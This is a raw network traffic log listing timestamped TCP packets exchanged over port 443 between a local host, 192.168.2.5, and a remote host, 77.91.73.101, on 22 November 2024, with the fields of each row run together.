                                                                Nov 22, 2024 17:12:05.086107016 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.086117029 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.086149931 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.086170912 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.095407963 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.095433950 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.095501900 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.095513105 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.095556021 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.103399038 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.103425026 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.103560925 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.103560925 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.103570938 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.103842020 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.111083031 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.111109018 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.111169100 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.111179113 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.111222982 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.142041922 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.142067909 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.142117023 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.142131090 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.142172098 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.393032074 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.393064976 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.393115997 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.393138885 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.393166065 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.393182993 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.471451998 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.471515894 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.471560955 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.471589088 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.471658945 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.471676111 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.471725941 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.471733093 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.471756935 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.471796989 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.471821070 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.471930981 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.471972942 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.471997976 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472004890 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472029924 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472057104 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472110987 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472160101 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472177982 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472184896 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472229004 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472249031 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472285986 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472326994 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472353935 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472358942 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472397089 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472417116 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472465992 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472505093 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472532988 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472538948 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472574949 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472594976 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472641945 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472687960 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472707033 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472713947 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472737074 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472754955 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472795010 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472839117 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472848892 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472862959 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.472886086 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.472904921 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.474977970 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.475019932 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.475058079 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.475064993 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.475101948 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.482671976 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.482738972 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.482749939 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.482774019 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.482795954 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.482815027 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.491525888 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.491575003 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.491620064 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.491640091 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.491666079 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.491691113 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.500268936 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.500336885 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.500366926 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.500385046 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.500410080 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.500431061 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.508502960 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.508547068 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.508580923 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.508599997 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.508670092 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.537614107 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.537659883 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.537709951 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.537731886 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.537755013 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.537775993 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.594342947 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.594391108 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.594429016 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.594460964 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.594482899 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.594501972 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.666657925 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.666690111 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.666739941 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.666769028 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.666786909 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.666806936 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.673144102 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.673167944 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.673218012 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.673238039 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.673269033 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.673284054 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.678749084 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.678776026 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.678833961 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.678845882 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.678873062 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.678894997 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.685456991 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.685481071 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.685527086 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.685538054 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.685571909 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.685604095 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.691648006 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.691673040 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.691710949 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.691723108 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.691756964 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.691776991 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.697648048 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.697673082 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.697714090 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.697725058 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.697757006 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.697777987 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.739005089 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.739032984 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.739089966 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.739110947 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.739130020 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.739154100 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.744313002 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.744334936 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.744388103 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.744400978 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.744455099 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.868662119 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.868701935 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.868779898 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.868802071 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.868834972 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.868859053 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.875376940 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.875405073 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.875505924 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.875534058 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.875556946 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.875853062 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.880069971 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.880140066 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.880220890 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.880227089 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.880275965 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.886523962 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.886554003 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.886626959 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.886643887 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.886699915 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.886723042 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.892910957 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.892947912 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.893079042 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.893094063 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.893156052 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.898955107 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.898987055 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.899091959 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.899107933 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.899164915 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.942234993 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.942271948 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.942569971 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.942591906 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.942635059 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.947915077 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.947940111 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.947994947 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:05.948007107 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:05.948045969 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.069561005 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.069596052 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.069675922 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.069694042 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.069734097 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.069758892 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.075908899 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.075937033 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.076010942 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.076024055 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.076071978 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.081718922 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.081751108 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.081818104 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.081828117 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.081861019 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.081876040 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.088059902 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.088090897 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.088170052 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.088182926 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.088222980 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.094485998 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.094516039 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.094585896 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.094598055 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.094635963 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.100774050 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.100806952 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.100877047 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.100883961 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.100924015 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.143529892 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.143558979 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.143647909 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.143662930 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.143702030 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.149455070 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.149507046 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.149580956 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.149585009 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.149740934 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.270535946 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.270580053 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.270689011 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.270736933 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.270766973 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.270878077 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.276959896 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.276998043 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.277086973 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.277105093 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.277133942 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.277189970 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.283385992 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.283422947 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.283513069 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.283531904 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.283591032 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.289098978 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.289127111 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.289247990 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.289247990 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.289319038 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.289439917 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.295511007 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.295532942 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.295610905 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.295633078 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.295658112 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.295681000 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.301647902 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.301692963 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.301763058 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.301780939 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.301815987 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.301840067 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.345180988 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.345216036 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.345252037 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.345273018 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.345289946 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.345309019 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.350964069 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.351001024 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.351052046 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.351072073 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.351100922 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.351115942 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.472451925 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.472486019 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.472536087 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.472548962 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.472580910 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.472604036 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.478827000 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.478857994 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.478889942 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.478895903 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.478925943 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.478952885 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.485287905 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.485315084 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.485344887 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.485348940 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.485395908 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.490930080 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.490957022 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.490995884 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.490999937 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.491029024 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.491046906 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.497426987 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.497453928 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.497508049 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.497512102 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.497561932 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.503443003 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.503468990 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.503566980 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.503566980 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.503572941 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.503607035 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.546704054 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.546742916 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.546827078 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.546844959 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.546890974 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.552309990 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.552341938 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.552376032 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.552392006 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.552434921 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.552453041 CET49744443192.168.2.577.91.73.101
                                                                Nov 22, 2024 17:12:06.673686981 CET4434974477.91.73.101192.168.2.5
                                                                Nov 22, 2024 17:12:06.673718929 CET4434974477.91.73.101192.168.2.5
